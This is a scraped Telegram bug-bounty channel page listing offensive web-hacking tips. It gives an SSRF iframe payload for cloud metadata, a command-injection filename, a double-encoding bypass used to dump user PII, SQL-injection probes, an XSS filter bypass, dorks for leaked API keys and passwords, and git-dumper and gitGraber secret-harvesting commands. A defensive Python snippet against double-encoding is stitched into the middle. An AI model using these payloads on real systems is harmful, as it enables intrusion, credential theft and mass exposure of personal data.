Dagen (security) – Telegram
Dagen (security)
637 subscribers
57 photos
4 files
98 links
Every system has a weak point, and every weak point is an opportunity for the birth of a legend.

Persian books channel: @persian_b_sec

Writeups channel: @pocofBugs
https://freedium.cfd/25-000-ssrf-in-hackerones-analytics-reports-b9a5b3aa3d6e
Easy SSRF in HackerOne 😎
Just inject this payload into the PDF file rendering:
<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>
https://freedium.cfd/https://medium.com/legionhunters/subdomain-dork-recon-via-3rd-party-54ea05b59a62
If you're interested in subdomain recon with Google dorks, don't miss this article! 👀
By introducing several lesser-known sources, the author teaches you creative ways to find a target's subdomains.
RCE in file upload:
fileName:"t';id;echo"
Easy $50 with this Google dork: 🗿

site:target.org intext:"test_" + intext:"api key"


API key tested and it worked :)
4.5M users' PII dumped + 20k bounty 🤯

/get_all_users —> 403 Forbidden
/get_all_userz —> 404 Not Found
Just double-encode the "s" to bypass the nginx filter.

final path:
/get_all_user%2573


All user data dumped :)

Source: https://www.youtube.com/watch?v=PXqlHAoF2wc
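A defender's view of the double-encoding bypass above, as an added example that is not from the channel: a filter that percent-decodes the path only once is fooled by %2573, while one that decodes to a fixed point before matching is not, and a short check flags double-encoded requests in access logs. The blocked prefix and the sample paths are constructed for illustration.

```python
from urllib.parse import unquote

# Constructed: the path the proxy/WAF was supposed to deny.
BLOCKED_PREFIXES = ("/get_all_users",)


def single_decode_filter(raw_path: str) -> bool:
    """Naive filter: decode once, then compare.

    %2573 decodes to %73 (not yet 's'), so the comparison misses it.
    """
    return unquote(raw_path).startswith(BLOCKED_PREFIXES)


def canonicalize(raw_path: str, max_rounds: int = 5) -> str:
    """Percent-decode until the path stops changing (%2573 -> %73 -> s).

    A bound on the rounds keeps pathological inputs from looping.
    """
    path = raw_path
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            return path
        path = decoded
    raise ValueError("path did not stabilise after %d decode rounds" % max_rounds)


def hardened_filter(raw_path: str) -> bool:
    """Match against the fully decoded path, so encoding depth does not matter."""
    return canonicalize(raw_path).startswith(BLOCKED_PREFIXES)


def is_double_encoded(raw_path: str) -> bool:
    """Detection signal for logs: a second decode still changes the path."""
    once = unquote(raw_path)
    return once != unquote(once)


def flag_double_encoded(paths):
    """Return the request paths from an access log that carry nested encoding."""
    return [p for p in paths if is_double_encoded(p)]


if __name__ == "__main__":
    # Constructed sample of request paths as they would appear in an access log.
    sample = ["/get_all_users", "/get_all_userz", "/get_all_user%73", "/get_all_user%2573"]
    for p in sample:
        print(p, "naive:", single_decode_filter(p), "hardened:", hardened_filter(p))
    print("double-encoded:", flag_double_encoded(sample))
```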
Easily Detect SQL Injection Points 🛡

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1''asd''
Simple information disclosure: 🤌

Find this endpoint:

GET v2/user/profile?clubname=123


Just change the API version and fuzz the clubname:

GET v1.0/user/profile?clubname=447 —> FUZZ


What happened? It leaked the owner's email, phone number, ID and state. 🗿
Finding hidden subdomains with dnsgen + puredns
#Methodology
Finding secrets in source via .map files: 👀

Step 1: find the JS files, e.g. main.min.js, bundle.js, app.js

Step 2: append .map to the filename

Step 3: unpack it:
 npx source-map-unpacker -p main.min.js.map

Information leaks like admin tokens & sensitive endpoints :)
XSS payload when javanoscript: and () are filtered:

<a href="jav&#x0A;anoscript:&#x0A;confirm``">click me</a>
#Methodology
Find dev files: .env, .git, .bak, .log, .sql 👀

- Historical URLs
gau --subs target.com | grep -iE "\.git|\.env|\.log|\.sql"

- Directory bruteforce —> wordlist: https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/fuzz-Bo0oM.txt
ffuf -u https://target.com/FUZZ -w dev_files.txt -t 100

- GitHub dorking
filename:.env DB_PASSWORD site:github.com


OK, if you find it, how do you use .git? Use git-dumper:
git-dumper https://target.com/.git/ /tmp/output
cd /tmp/output && cat config && git log


Impact: leaks private API keys
#Methodology

GitHub recon:

"example.com" password

- JSON search
"example.com" "password":

- Organization name
org:example password

- Sensitive files
"example.com" path:/.env

- Language
"example.com" language:PHP password

- Custom GitHub dork
"domain" AND ("api_key" OR "secret" OR "password" OR "access_token" OR "client_secret" OR "private_key" OR "AWS_SECRET_ACCESS_KEY" OR "DB_PASSWORD" OR "slack_token" OR "github_token" OR "BEGIN RSA PRIVATE KEY")

————————————————————-
Tool: https://github.com/hisxo/gitGraber
- Search for a domain
python3 gitGraber.py -k wordlists/keywords.txt -q "example.com" -s